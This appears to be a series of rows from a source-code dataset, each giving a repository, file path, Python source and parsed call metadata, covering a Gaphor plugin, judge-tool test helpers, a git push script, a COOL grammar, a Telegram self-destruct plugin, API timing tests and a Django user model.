| [((54, 13, 54, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((26, 27, 26, 77), 'os.path.join', 'os.path.join', ({(26, 40, 26, 50): 'prefix_dir', (26, 52, 26, 60): '"""python"""', (26, 62, 26, 76): '"""flexflow_c.h"""'}, {}), "(prefix_dir, 'python', 'flexflow_c.h')", False, 'import os\n'), ((27, 29, 27, 75), 'os.path.join', 'os.path.join', ({(27, 42, 27, 52): 'prefix_dir', (27, 54, 27, 63): '"""include"""', (27, 65, 27, 74): '"""model.h"""'}, {}), "(prefix_dir, 'include', 'model.h')", False, 'import os\n'), ((28, 11, 28, 43), 'os.path.exists', 'os.path.exists', ({(28, 26, 28, 42): 'flexflow_ch_path'}, {}), '(flexflow_ch_path)', False, 'import os\n'), ((28, 48, 28, 82), 'os.path.exists', 'os.path.exists', ({(28, 63, 28, 81): 'flexflow_cxxh_path'}, {}), '(flexflow_cxxh_path)', False, 'import os\n'), ((29, 32, 29, 67), 'os.path.join', 'os.path.join', ({(29, 45, 29, 55): 'prefix_dir', (29, 57, 29, 66): '"""include"""'}, {}), "(prefix_dir, 'include')", False, 'import os\n'), ((41, 13, 41, 100), 'subprocess.check_output', 'subprocess.check_output', ({(41, 37, 41, 99): "['gcc', '-I', flexflow_cxxh_dir, '-E', '-P', flexflow_ch_path]"}, {}), "(['gcc', '-I', flexflow_cxxh_dir, '-E', '-P',\n flexflow_ch_path])", False, 'import subprocess\n'), ((48, 37, 48, 63), 'os.path.realpath', 'os.path.realpath', ({(48, 54, 48, 62): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((50, 14, 50, 65), 'os.path.join', 'os.path.join', ({(50, 27, 50, 37): 'output_dir', (50, 39, 50, 64): '"""flexflow_cffi_header.py"""'}, {}), "(output_dir, 'flexflow_cffi_header.py')", False, 'import os\n'), ((43, 43, 43, 69), 'os.path.realpath', 'os.path.realpath', ({(43, 60, 43, 68): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
tuxcell/gaphor | gaphor/plugins/xmiexport/__init__.py | 22eb13479f589a0105ad25a11aed968e9ad932dc | """This plugin extends Gaphor with XMI export functionality."""
import logging
from gaphor.abc import ActionProvider, Service
from gaphor.core import action, gettext
from gaphor.plugins.xmiexport import exportmodel
from gaphor.ui.filedialog import FileDialog
logger = logging.getLogger(__name__)
class XMIExport(Service, ActionProvider):
def __init__(self, element_factory, file_manager, export_menu):
self.element_factory = element_factory
self.file_manager = file_manager
export_menu.add_actions(self)
def shutdown(self):
pass
@action(
name="file-export-xmi",
label=gettext("Export to XMI"),
tooltip=gettext("Export model to XMI (XML Model Interchange) format"),
)
def execute(self):
filename = self.file_manager.filename
filename = filename.replace(".gaphor", ".xmi") if filename else "model.xmi"
file_dialog = FileDialog(
gettext("Export model to XMI file"), action="save", filename=filename
)
filename = file_dialog.selection
if filename and len(filename) > 0:
logger.debug(f"Exporting XMI model to: {filename}")
export = exportmodel.XMIExport(self.element_factory)
try:
export.export(filename)
except Exception as e:
logger.error(f"Error while saving model to file {filename}: {e}")
| [((10, 9, 10, 36), 'logging.getLogger', 'logging.getLogger', ({(10, 27, 10, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((31, 12, 31, 47), 'gaphor.core.gettext', 'gettext', ({(31, 20, 31, 46): '"""Export model to XMI file"""'}, {}), "('Export model to XMI file')", False, 'from gaphor.core import action, gettext\n'), ((38, 21, 38, 64), 'gaphor.plugins.xmiexport.exportmodel.XMIExport', 'exportmodel.XMIExport', ({(38, 43, 38, 63): 'self.element_factory'}, {}), '(self.element_factory)', False, 'from gaphor.plugins.xmiexport import exportmodel\n'), ((24, 14, 24, 38), 'gaphor.core.gettext', 'gettext', ({(24, 22, 24, 37): '"""Export to XMI"""'}, {}), "('Export to XMI')", False, 'from gaphor.core import action, gettext\n'), ((25, 16, 25, 77), 'gaphor.core.gettext', 'gettext', ({(25, 24, 25, 76): '"""Export model to XMI (XML Model Interchange) format"""'}, {}), "('Export model to XMI (XML Model Interchange) format')", False, 'from gaphor.core import action, gettext\n')] |
btk15049/online-judge-tools | tests/utils.py | 22505e98359c50df06e7cc1d53a7d253cb096b14 | import contextlib
import os
import pathlib
import subprocess
import sys
import tempfile
@contextlib.contextmanager
def chdir(path):
cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(cwd)
def prepare_files(files):
for f in files:
path = pathlib.Path(f['path'])
path.parent.mkdir(parents=True, exist_ok=True)
with open(str(path), 'w') as fh:
fh.write(f['data'])
if f.get('executable', False):
path.chmod(0o755)
@contextlib.contextmanager
def sandbox(files):
with tempfile.TemporaryDirectory() as tempdir:
with chdir(tempdir):
prepare_files(files)
yield tempdir
def get_oj_exe():
oj_exe = os.environ.get('TEST_OJ_EXE')
if oj_exe is not None:
return [str(pathlib.Path(oj_exe).resolve())]
else:
return [sys.executable, '-m', 'onlinejudge._implementation.main']
def run(args, *, env=None, check=False, oj_exe=get_oj_exe()):
# oj_exe should be evaluated out of sandboxes
env = env or dict(os.environ)
env['PYTHONPATH'] = str(pathlib.Path(__file__).parent.parent) # this is required to run in sandboxes
return subprocess.run(oj_exe + args, stdout=subprocess.PIPE, stderr=sys.stderr, env=env, check=check)
def run_in_sandbox(args, files):
with sandbox(files) as tempdir:
proc = run(args)
return {
'proc': proc,
'tempdir': tempdir,
}
def cat():
if os.name == 'nt':
return '{} -c "import sys; sys.stdout.buffer.write(sys.stdin.buffer.read())"'.format(sys.executable)
else:
return 'cat'
def sleep_1sec():
if os.name == 'nt':
return '{} -c "import time; time.sleep(1)"'.format(sys.executable)
else:
return 'sleep 1.0'
def python_c(cmd):
assert '"' not in cmd
return '{} -c "{}"'.format(sys.executable, cmd)
def python_script(path):
assert '"' not in path
return '{} "{}"'.format(sys.executable, path)
def is_logged_in(service, memo={}):
# functools.lru_cache is unusable since Service are unhashable
url = service.get_url()
if url not in memo:
proc = run(['login', '--check', url])
memo[url] = proc.returncode == 0
return memo[url]
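# Usage sketch (hypothetical test): run the oj CLI inside a throwaway tree.
#
# result = run_in_sandbox(
#     ['--version'],
#     files=[{'path': 'test/sample-1.in', 'data': '42\n'}])
# assert result['proc'].returncode == 0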
| [((11, 10, 11, 21), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((38, 13, 38, 42), 'os.environ.get', 'os.environ.get', ({(38, 28, 38, 41): '"""TEST_OJ_EXE"""'}, {}), "('TEST_OJ_EXE')", False, 'import os\n'), ((49, 11, 49, 105), 'subprocess.run', 'subprocess.run', (), '', False, 'import subprocess\n'), ((13, 8, 13, 22), 'os.chdir', 'os.chdir', ({(13, 17, 13, 21): 'path'}, {}), '(path)', False, 'import os\n'), ((16, 8, 16, 21), 'os.chdir', 'os.chdir', ({(16, 17, 16, 20): 'cwd'}, {}), '(cwd)', False, 'import os\n'), ((21, 15, 21, 38), 'pathlib.Path', 'pathlib.Path', ({(21, 28, 21, 37): "f['path']"}, {}), "(f['path'])", False, 'import pathlib\n'), ((31, 9, 31, 38), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ({}, {}), '()', False, 'import tempfile\n'), ((48, 28, 48, 50), 'pathlib.Path', 'pathlib.Path', ({(48, 41, 48, 49): '__file__'}, {}), '(__file__)', False, 'import pathlib\n'), ((40, 20, 40, 40), 'pathlib.Path', 'pathlib.Path', ({(40, 33, 40, 39): 'oj_exe'}, {}), '(oj_exe)', False, 'import pathlib\n')] |
zerzerzerz/Computer-Virus | git_operation.py | 4a3125b45e0e4210fb1b8c970a0d6c6bde77f2e8 | import os
commit_string = "Select how many leading dimensions of data participate in training"
not_add = ['results', 'data', 'weights']
for item in os.listdir():
if item in not_add:
# print(item)
continue
else:
os.system(f"git add {item}")
os.system(f'git commit -m "{commit_string}"')
os.system("git push origin main") | [((5, 12, 5, 24), 'os.listdir', 'os.listdir', ({}, {}), '()', False, 'import os\n'), ((11, 0, 11, 45), 'os.system', 'os.system', ({(11, 10, 11, 44): 'f"""git commit -m "{commit_string}\\""""'}, {}), '(f\'git commit -m "{commit_string}"\')', False, 'import os\n'), ((12, 0, 12, 33), 'os.system', 'os.system', ({(12, 10, 12, 32): '"""git push origin main"""'}, {}), "('git push origin main')", False, 'import os\n'), ((10, 8, 10, 36), 'os.system', 'os.system', ({(10, 18, 10, 35): 'f"""git add {item}"""'}, {}), "(f'git add {item}')", False, 'import os\n')] |
peanut-butter-jellyyy/cool-compiler-2021 | src/cool_grammar.py | 63a668d435ed22cfb8dbb096bc3c82a34f09517b | from src.cmp.pycompiler import Grammar
from src.ast_nodes import (
ProgramNode,
ClassDeclarationNode,
FuncDeclarationNode,
AttrDeclarationNode,
IfNode,
WhileNode,
LetNode,
CaseNode,
IsvoidNode,
AssignNode,
VarDeclarationNode,
CaseItemNode,
NotNode,
LessNode,
LessEqualNode,
EqualNode,
PlusNode,
MinusNode,
StarNode,
DivNode,
NegNode,
InstantiateNode,
BlockNode,
CallNode,
ConstantNumNode,
VariableNode,
BooleanNode,
StringNode,
)
def define_cool_grammar(print_grammar=False):
# grammar
G = Grammar()
# non-terminals
program = G.NonTerminal("<program>", startSymbol=True)
class_list, def_class = G.NonTerminals("<class-list> <def-class>")
feature_list, def_attr, def_func = G.NonTerminals(
"<feature-list> <def-attr> <def-func>"
)
param_list, param = G.NonTerminals("<param-list> <param>")
expr, comp, arith, term, factor, element, atom = G.NonTerminals(
"<expr> <comp> <arith> <term> <factor> <element> <atom>"
)
identifiers_list, identifier_init = G.NonTerminals("<ident-list> <ident-init>")
block, case_block, case_item = G.NonTerminals("<block> <case-block> <case-item>")
func_call, arg_list = G.NonTerminals("<func-call> <arg-list>")
# terminals
classx, inherits, notx, isvoid = G.Terminals("class inherits not isvoid")
let, inx = G.Terminals("let in")
ifx, then, elsex, fi = G.Terminals("if then else fi")
whilex, loop, pool = G.Terminals("while loop pool")
case, of, esac = G.Terminals("case of esac")
semi, colon, comma, dot, opar, cpar, ocur, ccur, at, larrow, rarrow = G.Terminals(
"; : , . ( ) { } @ <- =>"
)
    equal, plus, minus, star, div, less, lesseq, neg = G.Terminals(
        "= + - * / < <= ~"
    )
idx, num, new, string, true, false = G.Terminals("id int new string true false")
# productions
program %= class_list, lambda h, s: ProgramNode(s[1])
class_list %= def_class + class_list, lambda h, s: [s[1]] + s[2]
class_list %= def_class, lambda h, s: [s[1]]
def_class %= (
classx + idx + ocur + feature_list + ccur + semi,
lambda h, s: ClassDeclarationNode(s[2], s[4]),
)
def_class %= (
classx + idx + inherits + idx + ocur + feature_list + ccur + semi,
lambda h, s: ClassDeclarationNode(s[2], s[6], s[4]),
)
feature_list %= def_attr + semi + feature_list, lambda h, s: [s[1]] + s[3]
feature_list %= def_func + semi + feature_list, lambda h, s: [s[1]] + s[3]
feature_list %= G.Epsilon, lambda h, s: []
def_attr %= (
idx + colon + idx + larrow + expr,
lambda h, s: AttrDeclarationNode(s[1], s[3], s[5]),
)
def_attr %= idx + colon + idx, lambda h, s: AttrDeclarationNode(s[1], s[3])
def_func %= (
idx + opar + param_list + cpar + colon + idx + ocur + expr + ccur,
lambda h, s: FuncDeclarationNode(s[1], s[3], s[6], s[8]),
)
param_list %= param + comma + param_list, lambda h, s: [s[1]] + s[3]
param_list %= param, lambda h, s: [s[1]]
param_list %= G.Epsilon, lambda h, s: []
param %= idx + colon + idx, lambda h, s: (s[1], s[3])
expr %= idx + larrow + expr, lambda h, s: AssignNode(s[1], s[3])
expr %= let + identifiers_list + inx + expr, lambda h, s: LetNode(s[2], s[4])
expr %= (
ifx + expr + then + expr + elsex + expr + fi,
lambda h, s: IfNode(s[2], s[4], s[6]),
)
expr %= whilex + expr + loop + expr + pool, lambda h, s: WhileNode(s[2], s[4])
expr %= case + expr + of + case_block + esac, lambda h, s: CaseNode(s[2], s[4])
expr %= notx + expr, lambda h, s: NotNode(s[2])
expr %= comp, lambda h, s: s[1]
identifiers_list %= (
identifier_init + comma + identifiers_list,
lambda h, s: [s[1]] + s[3],
)
identifiers_list %= identifier_init, lambda h, s: [s[1]]
identifier_init %= (
idx + colon + idx + larrow + expr,
lambda h, s: VarDeclarationNode(s[1], s[3], s[5]),
)
identifier_init %= idx + colon + idx, lambda h, s: VarDeclarationNode(s[1], s[3])
case_block %= case_item + case_block, lambda h, s: [s[1]] + s[2]
case_block %= case_item, lambda h, s: [s[1]]
case_item %= (
idx + colon + idx + rarrow + expr + semi,
lambda h, s: CaseItemNode(s[1], s[3], s[5]),
)
comp %= comp + less + arith, lambda h, s: LessNode(s[1], s[3])
comp %= comp + equal + arith, lambda h, s: EqualNode(s[1], s[3])
comp %= comp + lesseq + arith, lambda h, s: LessEqualNode(s[1], s[3])
comp %= arith, lambda h, s: s[1]
arith %= arith + plus + term, lambda h, s: PlusNode(s[1], s[3])
arith %= arith + minus + term, lambda h, s: MinusNode(s[1], s[3])
arith %= term, lambda h, s: s[1]
term %= term + star + factor, lambda h, s: StarNode(s[1], s[3])
term %= term + div + factor, lambda h, s: DivNode(s[1], s[3])
term %= factor, lambda h, s: s[1]
factor %= isvoid + element, lambda h, s: IsvoidNode(s[2])
factor %= neg + element, lambda h, s: NegNode(s[2])
factor %= new + idx, lambda h, s: InstantiateNode(s[2])
factor %= element, lambda h, s: s[1]
element %= opar + expr + cpar, lambda h, s: s[2]
element %= ocur + block + ccur, lambda h, s: BlockNode(s[2])
element %= (element + dot + func_call, lambda h, s: CallNode(*s[3], obj=s[1]))
element %= (
element + at + idx + dot + func_call,
lambda h, s: CallNode(*s[5], obj=s[1], at_type=s[3]),
)
element %= func_call, lambda h, s: CallNode(*s[1])
element %= atom, lambda h, s: s[1]
atom %= num, lambda h, s: ConstantNumNode(s[1])
atom %= idx, lambda h, s: VariableNode(s[1])
atom %= (
true,
lambda h, s: BooleanNode(s[1]),
)
atom %= false, lambda h, s: BooleanNode(s[1])
atom %= string, lambda h, s: StringNode(s[1])
block %= expr + semi, lambda h, s: [s[1]]
block %= expr + semi + block, lambda h, s: [s[1]] + s[3]
func_call %= idx + opar + arg_list + cpar, lambda h, s: (s[1], s[3])
arg_list %= expr + comma + arg_list, lambda h, s: [s[1]] + s[3]
arg_list %= expr, lambda h, s: [s[1]]
arg_list %= G.Epsilon, lambda h, s: []
if print_grammar:
print(G)
return (G, idx, string, num)
| [((36, 8, 36, 17), 'src.cmp.pycompiler.Grammar', 'Grammar', ({}, {}), '()', False, 'from src.cmp.pycompiler import Grammar\n'), ((67, 40, 67, 57), 'src.ast_nodes.ProgramNode', 'ProgramNode', ({(67, 52, 67, 56): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((74, 21, 74, 53), 'src.ast_nodes.ClassDeclarationNode', 'ClassDeclarationNode', ({(74, 42, 74, 46): 's[2]', (74, 48, 74, 52): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((78, 21, 78, 59), 'src.ast_nodes.ClassDeclarationNode', 'ClassDeclarationNode', ({(78, 42, 78, 46): 's[2]', (78, 48, 78, 52): 's[6]', (78, 54, 78, 58): 's[4]'}, {}), '(s[2], s[6], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((87, 21, 87, 58), 'src.ast_nodes.AttrDeclarationNode', 'AttrDeclarationNode', ({(87, 41, 87, 45): 's[1]', (87, 47, 87, 51): 's[3]', (87, 53, 87, 57): 's[5]'}, {}), '(s[1], s[3], s[5])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((89, 48, 89, 79), 'src.ast_nodes.AttrDeclarationNode', 'AttrDeclarationNode', ({(89, 68, 89, 72): 's[1]', (89, 74, 89, 78): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((93, 21, 93, 64), 'src.ast_nodes.FuncDeclarationNode', 'FuncDeclarationNode', ({(93, 41, 93, 45): 's[1]', (93, 47, 93, 51): 's[3]', (93, 53, 93, 57): 's[6]', (93, 59, 93, 63): 's[8]'}, {}), '(s[1], s[3], s[6], s[8])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((102, 46, 102, 
68), 'src.ast_nodes.AssignNode', 'AssignNode', ({(102, 57, 102, 61): 's[1]', (102, 63, 102, 67): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((103, 62, 103, 81), 'src.ast_nodes.LetNode', 'LetNode', ({(103, 70, 103, 74): 's[2]', (103, 76, 103, 80): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((106, 21, 106, 45), 'src.ast_nodes.IfNode', 'IfNode', ({(106, 28, 106, 32): 's[2]', (106, 34, 106, 38): 's[4]', (106, 40, 106, 44): 's[6]'}, {}), '(s[2], s[4], s[6])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((108, 61, 108, 82), 'src.ast_nodes.WhileNode', 'WhileNode', ({(108, 71, 108, 75): 's[2]', (108, 77, 108, 81): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((109, 63, 109, 83), 'src.ast_nodes.CaseNode', 'CaseNode', ({(109, 72, 109, 76): 's[2]', (109, 78, 109, 82): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((110, 38, 110, 51), 'src.ast_nodes.NotNode', 'NotNode', ({(110, 46, 110, 50): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((121, 21, 121, 57), 'src.ast_nodes.VarDeclarationNode', 'VarDeclarationNode', ({(121, 40, 121, 44): 's[1]', (121, 46, 121, 50): 's[3]', (121, 52, 121, 56): 's[5]'}, {}), '(s[1], s[3], s[5])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, 
Aliensuniquebot/CatUserbot | userbot/plugins/selfdestruct.py | 93561a620fc1198c6fe6c259412088f4bc81d97b | # For @UniBorg
# courtesy Yasir siddiqui
"""Self Destruct Plugin
.sd <time in seconds> <text>
"""
import asyncio
from userbot import CMD_HELP
from userbot.utils import admin_cmd
@borg.on(admin_cmd(pattern="sdm", outgoing=True))
async def selfdestruct(destroy):
if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"):
message = destroy.text
counter = int(message[5:7])
text = str(destroy.text[7:])
await destroy.delete()
smsg = await destroy.client.send_message(destroy.chat_id, text)
        await asyncio.sleep(counter)  # non-blocking; time.sleep would stall the whole event loop
await smsg.delete()
@borg.on(admin_cmd(pattern="selfd", outgoing=True ))
async def selfdestruct_show(destroy):
if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"):
message = destroy.text
counter = int(message[7:9])
text = str(destroy.text[9:])
text = (
text
+ "\n\n`This message shall be self-destructed in "
+ str(counter)
+ " seconds`"
)
await destroy.delete()
smsg = await destroy.client.send_message(destroy.chat_id, text)
        await asyncio.sleep(counter)  # non-blocking sleep, as above
await smsg.delete()
CMD_HELP.update({
"selfdestruct":
".sdm number | [text]\
\nUsage: self destruct this message in number seconds \
\n\n.self number | [text]\
\nUsage:self destruct this message in number seconds with showing that it will destruct. \
"
})
OSAMAMOHAMED1234/python_projects | snippets/basic_render_template_class.py | fb4bc7356847c3f46df690a9386cf970377a6f7c | import os
class Template:
template_name = ''
context = None
def __init__(self, template_name='', context=None, *args, **kwargs):
self.template_name = template_name
self.context = context
def get_template(self):
    template_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates', self.template_name)
if not os.path.exists(template_path):
raise Exception(f'This path does not exist : {template_path}')
template_string = ''
with open(template_path, 'r') as f:
template_string = f.read()
return template_string
def render(self, context=None):
render_ctx = context
    if self.context is not None:
render_ctx = self.context
if not isinstance(render_ctx, dict):
render_ctx = {}
template_string = self.get_template()
return template_string.format(**render_ctx)
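# NOTE (assumption): templates/test.html is not included in this snippet. Since
# render() delegates to str.format, the file would hold format-style
# placeholders, e.g.:
#
#   <h1>Hello {name}!</h1>
#
# Literal braces in such a template must be doubled ({{ and }}).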
obj = Template(template_name='test.html', context={'name': 'OSAMA'})
print(obj.render())
obj.context = None
print(obj.render(context={'name': 'os'}))
obj2 = Template(template_name='test.html')
print(obj2.render(context={'name': 'os'}))
jameskzhao/python36 | level_one/strings.py | 855e8a6e164065702efa7773da1f089454fdcbcc | #Basics
a = "hello"
a += " I'm a dog"
print(a)
print(len(a))
print(a[1:]) #Output: ello I'm a dog
print(a[:5]) #Output: hello(index 5 is not included)
print(a[2:5])#Output: llo(index 2 is included)
print(a[::2])#Step size
#strings are immutable, so you can't assign a[1] = 'b'
x = a.upper()
print(x)
x = a.capitalize()
print(x)
x = a.split('e')
print(x)
x = a.split() #splits the string by space
print(x)
x = a.strip() #removes any whitespace from beginning or the end
print(x)
x = a.replace('l','xxx')
print(x)
x = "Insert another string here: {}".format('insert me!')
x = "Item One: {} Item Two: {}".format('dog', 'cat')
print(x)
x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat')
print(x)
#command-line string input
print("Enter your name:")
x = input()
print("Hello: {}".format(x)) | [] |
glushkovvv/test_2gis | tests/test_01_accept_time_get_headers.py | 2affff49411a3c7ff77e9d399ec86eb314aa3757 | # -*- coding: utf-8 -*-
"""
test_01_accept_time_get_headers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The 2GIS API Test
Checks the response time of GET requests
:author: Vadim Glushkov
:copyright: Copyright 2019, The 2GIS API Test
:license: MIT
:version: 1.0.0
:maintainer: Vadim Glushkov
:email: [email protected]
:status: Development
"""
import pytest
import allure
from tools.api_responses import get_response
@allure.epic("Поизитивные тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 5},
{"country_code": "ru", "page": 1, "page_size": 5},
{"q": "ОРСК"}])
def test_01_time_response_for_valid_request(setup_option, json_params):
"""
    Check the server response time for valid requests
    :param setup_option: test setup parameters
    :type setup_option: dict
    :param json_params: GET request parameters
    :type json_params: dict
    :return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.2
    assert check, f"""Response time {api_response.elapsed.total_seconds()} s exceeds 0.2 s\r\n""" + testing_message
@allure.epic("Смок тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 2},
{"country_code": "tz", "page": 1, "page_size": 5},
{"q": "ОР"}])
def test_01_time_response_for_invalid_request(setup_option, json_params):
"""
    Check the server response time for invalid requests
    :param setup_option: test setup parameters
    :type setup_option: dict
    :param json_params: GET request parameters
    :type json_params: dict
    :return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.5
    assert check, f"""Response time {api_response.elapsed.total_seconds()} s exceeds 0.5 s\r\n""" + testing_message
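# NOTE (assumption): tools.api_responses.get_response is not shown in this
# file. A minimal sketch matching how the tests use the returned object
# (.url, .status_code, .headers, .content, .elapsed) could simply return the
# raw requests.Response:
#
#   import requests
#
#   def get_response(api_url, request_params):
#       return requests.get(api_url, params=request_params)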
ucds-sg/h2oai | transformers/string/strlen_transformer.py | 7042860767dc25d1a7d7122103bbd5016d02df53 | """Returns the string length of categorical values"""
from h2oaicore.transformer_utils import CustomTransformer
import datatable as dt
import numpy as np
class MyStrLenEncoderTransformer(CustomTransformer):
@staticmethod
def get_default_properties():
return dict(col_type="any", min_cols=1, max_cols=1, relative_importance=1)
def fit_transform(self, X: dt.Frame, y: np.array = None):
return self.transform(X)
def transform(self, X: dt.Frame):
return X.to_pandas().astype(str).iloc[:, 0].str.len()
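# A framework-free illustration of what transform() computes (assumes a single
# string column; not part of the original transformer):
#
#   frame = dt.Frame({"city": ["Oslo", "Lisbon", None]})
#   frame.to_pandas().astype(str).iloc[:, 0].str.len()   # -> 4, 6, 4
#   # (None is stringified to the 4-character "None" before measuring)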
eerzin/eo-learn | geometry/eolearn/geometry/__init__.py | 53c5cc229de13b98b5778aeb1d45950c25bf2f95 | """
Subpackage containing EOTasks for geometrical transformations
"""
from .utilities import ErosionTask, VectorToRaster, RasterToVector
from .sampling import PointSamplingTask, PointSampler, PointRasterSampler
__version__ = '0.4.2'
felipebarraza6/startup_comedy | api/models/users.py | 42b4a4547bffc0d7cf34ace520355d80053bbd9e | """User Model."""
# Django
from django.db import models
from django.contrib.auth.models import AbstractUser
# Utilities
from .utils import ApiModel
class User(ApiModel, AbstractUser):
email = models.EmailField(
'email',
        unique=True,
)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username', 'first_name', 'last_name']
is_student = models.BooleanField(default=False)
class Meta:
verbose_name='Usuario'
verbose_name_plural='Usuarios'
def __str__(self):
return self.username
def get_short_name(self):
return self.username
class ProfileUser(ApiModel):
